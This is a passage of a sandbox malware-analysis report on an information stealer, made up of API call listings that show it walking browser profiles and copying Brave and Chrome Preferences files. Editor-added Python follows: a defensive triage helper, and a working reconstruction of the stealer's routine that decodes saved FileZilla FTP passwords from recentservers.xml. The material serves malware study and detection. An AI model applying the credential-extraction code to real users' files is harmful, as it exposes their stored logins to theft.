                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 2635522530-726946144
                              • Opcode ID: 6654c35a73724b5b1a6264644f21d49dcc0c8875920008d86822f9119f104742
                              • Instruction ID: 91c13f8582bc717cb412c95632c068c28e3b027308062ad8d08f310dbe01b8d0
                              • Opcode Fuzzy Hash: 6654c35a73724b5b1a6264644f21d49dcc0c8875920008d86822f9119f104742
                              • Instruction Fuzzy Hash: 48924E7191524ADBDB21EFA4DC89BEE77B9AF44300F444528F846A7352DB38EC46CB90
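                               Reading the two listings above together: the function at 007B16E2 resolves a base folder with SHGetFolderPathA and CSIDL 0x1C (CSIDL_LOCAL_APPDATA, where Chromium "User Data" profiles live), appends \*.* and walks it with FindFirstFileA; the function at 007BDBC1 walks a directory the same way, compares entry names against Brave, Preferences and Google Chrome, copies the matched file to another location with CopyFileA and bFailIfExists set to 00000001, then calls DeleteFileA. That is the stealer staging a copy of a browser profile artifact for collection. The script below is an added triage helper, not part of the Joe Sandbox output or of the sample: it parses listing lines in the exact format shown on this page and flags that walk-copy-delete pattern per function. The constructed inputs are abridged copies of the two listings. Assumptions, not taken from the page: the artifact names other than Preferences in BROWSER_ARTIFACTS, the reading of the two StrCmpCA calls right after FindFirstFileA as the usual "." and ".." skip (the report does not resolve those strings), and that resolved string arguments never contain a comma or closing parenthesis.

```python
"""Triage helper for the per-function 'APIs' listings in a Joe Sandbox report.

Added example: parses call lines as they appear in the report above and
flags the directory-walk / browser-profile-copy pattern. Not part of the
sandbox output or of the analysed sample."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# One listing line, e.g.
#   lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B16E2
#   Part of subcall function 007D4040: SHGetFolderPathA.SHELL32(...), ref: 007D406D
#   wsprintfA.USER32 ref: 007C392C            <- no argument list at all
# Assumption: resolved string arguments never contain ',' or ')'; the report
# prints pointers/immediates as 8 hex digits and unresolved values as '?'.
_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
_HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass
class ApiCall:
    api: str                      # e.g. "CopyFileA"
    module: str                   # e.g. "KERNEL32"
    args: List[str]               # raw argument tokens, in call order
    ref: str                      # call-site address inside the dump
    subcall_of: Optional[str]     # set for "Part of subcall function X:" lines

    def literals(self) -> List[str]:
        """Arguments the sandbox resolved to a string (not a pointer, not '?')."""
        return [a for a in self.args if a != "?" and not _HEX8.match(a)]


def parse_api_listing(text: str) -> List[ApiCall]:
    """Turn the bullet lines of one function's 'APIs' block into ApiCall records."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = _LINE.match(line)
        if not m:
            continue                      # blank lines and section headings
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["api"], m["mod"], args, m["ref"].upper(), m["sub"]))
    return calls


# Chromium profile files worth flagging. "Preferences" is the one this report
# resolves literally; the other names are an assumption about what a stealer
# usually copies and are not taken from the page.
BROWSER_ARTIFACTS = ("Preferences", "Login Data", "Cookies", "Web Data",
                     "Local State", "History")


def triage_function(calls: List[ApiCall]) -> dict:
    """Summarise one function: API histogram, resolved strings, harvest indicators."""
    counts = Counter(c.api for c in calls)
    literals = [s for c in calls for s in c.literals()]
    indicators = {
        # FindFirstFileA followed by two StrCmpCA calls is the usual walk that
        # skips "." and ".." (assumed: the report does not resolve those strings).
        "enumerates_directory": any(a in counts for a in ("FindFirstFileA", "FindFirstFileW")),
        "copies_file": any(a in counts for a in ("CopyFileA", "CopyFileW")),
        "deletes_file": any(a in counts for a in ("DeleteFileA", "DeleteFileW")),
        "browser_artifact_strings": sorted(
            {s for s in literals if any(name in s for name in BROWSER_ARTIFACTS)}),
    }
    # All four together: walk a profile directory, stage a copy of a browser
    # artifact elsewhere, delete it once read. That is the 007BDBC1 function.
    harvest = (indicators["enumerates_directory"] and indicators["copies_file"]
               and indicators["deletes_file"] and bool(indicators["browser_artifact_strings"]))
    return {"api_counts": dict(counts), "literals": literals,
            "indicators": indicators, "profile_harvest": harvest}


# Constructed inputs: abridged copies of two listings from the report above.
SAMPLE_WALK = r"""
• lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B16E2
• lstrlen.KERNEL32(\*.*), ref: 007B1971
• lstrcat.KERNEL32(00000000,\*.*), ref: 007B199A
  • Part of subcall function 007D4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 007D406D
• FindFirstFileA.KERNEL32(00000000,?), ref: 007B1B45
• StrCmpCA.SHLWAPI(?,007E17A0), ref: 007B1B70
• GetFileAttributesA.KERNEL32(00000000), ref: 007B1F45
"""
SAMPLE_BRAVE = r"""
• FindFirstFileA.KERNEL32(00000000,?), ref: 007BDCD0
• StrCmpCA.SHLWAPI(?,Brave), ref: 007BE0CD
• StrCmpCA.SHLWAPI(?,Preferences), ref: 007BE0E7
• CopyFileA.KERNEL32(00000000,?,00000001), ref: 007BE1F9
• lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 007BE2A7
• DeleteFileA.KERNEL32(?), ref: 007BE381
• StrCmpCA.SHLWAPI(?,Google Chrome), ref: 007BE776
• wsprintfA.USER32 ref: 007C392C
"""

if __name__ == "__main__":
    for name, text in (("007B16E2 walk", SAMPLE_WALK), ("007BDBC1 browser", SAMPLE_BRAVE)):
        report = triage_function(parse_api_listing(text))
        print(name, "profile_harvest =", report["profile_harvest"], report["indicators"])
```

                               Run against the full listings, the walk function at 007B16E2 reports only enumerates_directory, while 007BDBC1 trips all four indicators and lists Preferences and \Brave\Preferences as the resolved artifact strings. The pointer-only calls (lstrcpy/lstrcat with 00000000 arguments) carry no signal on their own; the value is in the few resolved strings and the file-operation APIs next to them, which is also what to pivot on in an endpoint telemetry search (a non-browser process copying a file named Preferences out of a browser profile path, then deleting it).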
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C18D2
                              • lstrlen.KERNEL32(\*.*), ref: 007C18DD
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C18FF
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 007C190B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1932
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007C1947
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007C1967
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007C1981
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C19BF
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C19F2
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C1A1A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C1A25
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1A4C
                              • lstrlen.KERNEL32(007E1794), ref: 007C1A5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1A80
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C1A8C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1AB4
                              • lstrlen.KERNEL32(?), ref: 007C1AC8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1AE5
                              • lstrcat.KERNEL32(00000000,?), ref: 007C1AF3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1B19
                              • lstrlen.KERNEL32(014589F8), ref: 007C1B2F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1B59
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C1B64
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1B8F
                              • lstrlen.KERNEL32(007E1794), ref: 007C1BA1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1BC3
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C1BCF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1BF8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1C25
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C1C30
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1C57
                              • lstrlen.KERNEL32(007E1794), ref: 007C1C69
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1C8B
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C1C97
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1CC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1CEF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C1CFA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1D21
                              • lstrlen.KERNEL32(007E1794), ref: 007C1D33
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1D55
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C1D61
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1D8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1DB9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C1DC4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1DED
                              • lstrlen.KERNEL32(007E1794), ref: 007C1E19
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1E36
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C1E42
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1E68
                              • lstrlen.KERNEL32(0145CFF8), ref: 007C1E7E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1EB2
                              • lstrlen.KERNEL32(007E1794), ref: 007C1EC6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1EE3
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C1EEF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1F15
                              • lstrlen.KERNEL32(0145D3E0), ref: 007C1F2B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1F5F
                              • lstrlen.KERNEL32(007E1794), ref: 007C1F73
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1F90
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C1F9C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1FC2
                              • lstrlen.KERNEL32(0144B260), ref: 007C1FD8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C2000
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C200B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C2036
                              • lstrlen.KERNEL32(007E1794), ref: 007C2048
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C2067
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C2073
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C2098
                              • lstrlen.KERNEL32(?), ref: 007C20AC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C20D0
                              • lstrcat.KERNEL32(00000000,?), ref: 007C20DE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C2103
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C213F
                              • lstrlen.KERNEL32(0145CF08), ref: 007C214E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C2176
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C2181
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                              • String ID: \*.*
                              • API String ID: 712834838-1173974218
                              • Opcode ID: 3cf053eb0a3c74165c9191621e2a9e6f5247064738190cbe2797123939cd64b8
                              • Instruction ID: cf2600a815c8292dc430cc0f6ee1668ff302dfb2a3470ee4740c4aaa5a079947
                              • Opcode Fuzzy Hash: 3cf053eb0a3c74165c9191621e2a9e6f5247064738190cbe2797123939cd64b8
                              • Instruction Fuzzy Hash: 6A626E319166569BDB21EF64CC89FAF77B9AF45700F45412CB805A7253DB38ED02CBA0
                              APIs
                              • wsprintfA.USER32 ref: 007C392C
                              • FindFirstFileA.KERNEL32(?,?), ref: 007C3943
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007C396C
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007C3986
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C39BF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C39E7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C39F2
                              • lstrlen.KERNEL32(007E1794), ref: 007C39FD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3A1A
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C3A26
                              • lstrlen.KERNEL32(?), ref: 007C3A33
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3A53
                              • lstrcat.KERNEL32(00000000,?), ref: 007C3A61
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3A8A
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C3ACE
                              • lstrlen.KERNEL32(?), ref: 007C3AD8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3B05
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C3B10
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3B36
                              • lstrlen.KERNEL32(007E1794), ref: 007C3B48
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3B6A
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C3B76
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3B9E
                              • lstrlen.KERNEL32(?), ref: 007C3BB2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3BD2
                              • lstrcat.KERNEL32(00000000,?), ref: 007C3BE0
                              • lstrlen.KERNEL32(01458B08), ref: 007C3C0B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3C31
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C3C3C
                              • lstrlen.KERNEL32(014589F8), ref: 007C3C5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3C84
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C3C8F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3CB7
                              • lstrlen.KERNEL32(007E1794), ref: 007C3CC9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3CE8
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C3CF4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3D1A
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C3D47
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C3D52
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3D79
                              • lstrlen.KERNEL32(007E1794), ref: 007C3D8B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3DAD
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C3DB9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3DE2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3E11
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C3E1C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3E43
                              • lstrlen.KERNEL32(007E1794), ref: 007C3E55
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3E77
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C3E83
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3EAC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3EDB
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C3EE6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3F0D
                              • lstrlen.KERNEL32(007E1794), ref: 007C3F1F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3F41
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C3F4D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3F75
                              • lstrlen.KERNEL32(?), ref: 007C3F89
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3FA9
                              • lstrcat.KERNEL32(00000000,?), ref: 007C3FB7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3FE0
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C401F
                              • lstrlen.KERNEL32(0145CF08), ref: 007C402E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4056
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C4061
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C408A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C40CE
                              • lstrcat.KERNEL32(00000000), ref: 007C40DB
                              • FindNextFileA.KERNEL32(00000000,?), ref: 007C42D9
                              • FindClose.KERNEL32(00000000), ref: 007C42E8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 1006159827-1013718255
                              • Opcode ID: 86d30660d8b3d26e53625f35e1444475d9c17cee17504582713806863648c703
                              • Instruction ID: c06d7c7d908f0241e73d0e6d52ad68e4ad82bbdaaaaddfc11b525be9a6ca980c
                              • Opcode Fuzzy Hash: 86d30660d8b3d26e53625f35e1444475d9c17cee17504582713806863648c703
                              • Instruction Fuzzy Hash: 10625F719166569BDB21EF64DC8DFEE77B9AF44700F04852CB805A7252DB38EE02CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6995
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 007C69C8 (nFolder 0x28 = CSIDL_PROFILE, the user's profile directory; the relative path \AppData\Roaming\FileZilla\recentservers.xml is appended to it in the calls that follow)
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6A02
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6A29
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C6A34
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6A5D
                              • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 007C6A77
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6A99
                              • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 007C6AA5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6AD0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6B00
                              • LocalAlloc.KERNEL32(00000040,?), ref: 007C6B35 (uFlags 0x40 = LPTR: fixed, zero-initialised buffer)
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6B9D
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6BCD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 313953988-555421843
                              • Opcode ID: 7655f69a4f4213e8a7a1738180e2c3e67a2eda4394f971fc9a773e267636492a
                              • Instruction ID: 3fa8aba22042919e87a25db0da953463a158d308e524ebc3657e6bdaab05fea9
                              • Opcode Fuzzy Hash: 7655f69a4f4213e8a7a1738180e2c3e67a2eda4394f971fc9a773e267636492a
                              • Instruction Fuzzy Hash: 8D425D71A15246ABDB21EBB4DC89FAE77B9AF44700F14441CF906EB252DB38DD02CB60
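Added worked example (editor's reconstruction, not code from the sample and not part of the Joe Sandbox report): a Python model of what the FileZilla routines above (007C6995, which builds \AppData\Roaming\FileZilla\recentservers.xml under CSIDL_PROFILE) and below (007C6B9D through 007C6F81) do according to their API traces and string table. The traced calls locate <Host>, <Port>, <User> and <Pass encoding="base64"> by plain substring search (StrStrA), base64-decode the password (CryptStringToBinaryA with dwFlags 1 = CRYPT_STRING_BASE64) and format the result with the literal labels browser: FileZilla, login:, password:, profile: null and url:. The sample XML is constructed here, and the per-<Server> loop, the output field order and the host:port form of url: are assumptions the report does not show.

```python
import base64

# Constructed sample of a FileZilla recentservers.xml; not recovered from the
# analysed sample. FileZilla stores the password base64-encoded, not encrypted,
# which is why a single CryptStringToBinaryA call is enough to recover it.
SAMPLE_RECENTSERVERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.0" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>alice</User>
      <Pass encoding="base64">cGFzc3dvcmQxMjM=</Pass>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>bob</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
    </Server>
    <Server>
      <Host>legacy.example.test</Host>
      <Port>21</Port>
      <User>carol</User>
      <Pass>plaintext-legacy</Pass>
    </Server>
  </RecentServers>
</FileZilla3>
"""

CRYPT_STRING_BASE64 = 0x1  # dwFlags value in the traced CryptStringToBinaryA calls


def text_after(buf: str, tag: str):
    """StrStrA-style scan: find the first occurrence of `tag` and return the
    text that follows it up to the next '<'. Returns None when `tag` is absent."""
    idx = buf.find(tag)
    if idx < 0:
        return None
    start = idx + len(tag)
    end = buf.find("<", start)
    return buf[start:end] if end >= 0 else buf[start:]


def decode_base64_password(encoded: str) -> str:
    """Equivalent of the two-call CryptStringToBinaryA(..., CRYPT_STRING_BASE64)
    pattern in the trace (size query, then decode); Python needs one call."""
    raw = base64.b64decode(encoded, validate=True)
    return raw.decode("utf-8", errors="replace")


def parse_recentservers(xml_text: str) -> list:
    """Extract host, port, user and decoded password per <Server> block.
    Assumption: one record per <Server>; the trace shows one scan per tag,
    not how the loop around them is structured."""
    records = []
    for block in xml_text.split("<Server>")[1:]:
        host = text_after(block, "<Host>")
        port = text_after(block, "<Port>")
        user = text_after(block, "<User>")
        pw_b64 = text_after(block, '<Pass encoding="base64">')
        # Only the base64 form is searched for in the listed calls, so a
        # legacy plain <Pass> element produces no record here.
        if None in (host, port, user, pw_b64):
            continue
        records.append({
            "host": host,
            "port": port,
            "user": user,
            "password": decode_base64_password(pw_b64),
        })
    return records


def format_record(rec: dict) -> str:
    """Render one record with the literal labels from the report's string
    table. Field order and the host:port form of url: are assumptions."""
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {rec['host']}:{rec['port']}\n"
        f"login: {rec['user']}\n"
        f"password: {rec['password']}\n"
    )


if __name__ == "__main__":
    for rec in parse_recentservers(SAMPLE_RECENTSERVERS_XML):
        print(format_record(rec))
```

The substring approach matters for defenders reconstructing impact: anything FileZilla has written to recentservers.xml (and, by the same mechanism, sitemanager.xml if the sample targets it, which this trace does not show) is recoverable by the stealer without any DPAPI or master-key step, because the encoding="base64" form is an encoding, not encryption.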
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BDBC1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDBE4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDBEF
                              • lstrlen.KERNEL32(007E4CA8), ref: 007BDBFA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDC17
                              • lstrcat.KERNEL32(00000000,007E4CA8), ref: 007BDC23
